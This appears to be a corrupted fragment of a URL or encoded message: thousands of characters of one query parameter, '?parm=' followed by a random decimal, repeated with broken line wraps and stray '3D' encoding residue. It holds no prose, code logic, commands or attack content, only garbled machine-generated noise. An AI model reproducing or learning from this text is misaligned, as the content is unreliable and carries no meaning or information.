rm=0.03510514000002962?parm=0.6746931283264278?parm=0.4470450325834908?parm=0.07785764204006762?parm=0.3401613372413357?parm=0.6885655479211563?parm=0.3378645245893567?parm=0.7530888030812639?parm=0.4385274529715908?parm=0.8546846734552437?parm=0.943562659437982?parm=0.2690958544139864?parm=0.9414778696948228?parm=0.9705285143976852?parm=0.03412914860633709?parm=0.5629524868314979?parm=0.26551896178241496?parm=0.9625820765908634?parm=0.6656541817421336?parm=0.6838127452100081?parm=0.2226939131764789?parm=0.48602838974004015?parm=0.2945117583623632?parm=0.529002994268698?parm=0.6426306330058106?parm=0.11966694941771472?parm=0.1721417044468887?parm=3D0.3754902481844036?parm=0.6737018509787533?parm=0.39546949087944683?parm=0.0491472806762866?parm=0.7376419322110352?parm=0.6499250853081242?parm=0.5242544168272583?parm=0.034808393547313354?parm - =0.4073861597524363?parm=0.05573713697624749?parm=0.9572804384429524?parm=0.1817429853821192?parm=0.014327680461904801?parm=0.17253608539764576?parm=0.8581309328485324?parm=0.9953321132994779?parm=0.08106975895631952?parm=0.4488913260181805?parm=0.1500808162508912?parm=0.6036570089972113?parm=0.3429374525213048?parm=0.5005802517999419?parm=0.051207514503536666?parm=0.766079189716261?parm=0.05149314425197127?parm=0.9171176947996869?parm=0.9128287890179406?parm=0.2472275256231583?parm=0.08768066601448787?parm=0.7282021350271008?parm=0.7364195421315026?parm=0.33803910476243226?parm=0.9731293024794875?parm=0.4665109365664606?parm=0.9599808584667793?parm=0.4666333564612767?parm=0.2870947294724183?parm=0.2525336676197266?parm=0.9769042933525486?parm=0.9091816595515594?parm=0.5717086294621162?parm=0.22264183558725903?parm=0.3786950609979425?par - 
m=0.5845679157357075?parm=0.5396548326610127?parm=0.9233495028064524?parm=0.0974877689966982?parm=0.7965176866365765?parm=0.2860844780143996?parm=0.0027286208156194203?parm=0.4651091074998567?parm=0.5730070981414728?parm=0.2505283628059568?parm=0.6441995109312953?parm=0.7025116726949593?parm=0.9451446634320427?parm=0.8747596688711037?parm=0.7084257035096256?parm=0.5067240755386497?parm=0.10635286404950961?parm=0.2590060181978189?parm=0.4757993339954312?parm=0.2120319757985698?parm=0.8975584037174784?parm=0.631604652076309?parm=0.2150116248909476?parm=0.46792574310758606?parm=0.4752334181586533?parm=0.11614011486437892?parm=0.5424607368502887?parm=3D0.49842045831432846?parm=0.3365122016115487?parm=0.10529902337628827?parm=0.6827568962602503?parm=0.7856740326146926?parm=0.09924147705627229?parm=0.5321218821234125?parm=0.29234258833331983?par - m=0.45540015833322023?parm=0.5647044038008046?parm=0.46702725451889426?parm=0.4662535800019342?parm=0.7323923339134595?parm=0.6268917225432019?parm=0.7629286375836214?parm=0.9123040395199864?parm=0.5815462771024456?parm=0.5345761196888793?parm=0.9209602153432136?parm=0.04748725664240383?parm=0.05308779345336989?parm=0.8610787797224873?parm=0.9557722872296609?parm=0.9481407994385496?parm=0.9102836584825768?parm=0.2914997397760458?parm=0.8020533987162777?parm=0.6684330848337933?parm=0.8337337199569539?parm=0.9983168241581639?parm=0.7228803317315997?parm=0.43098615737758783?parm=0.8684119503556965?parm=0.9436400538914193?parm=0.25569358266277475?parm3D0.58895697 -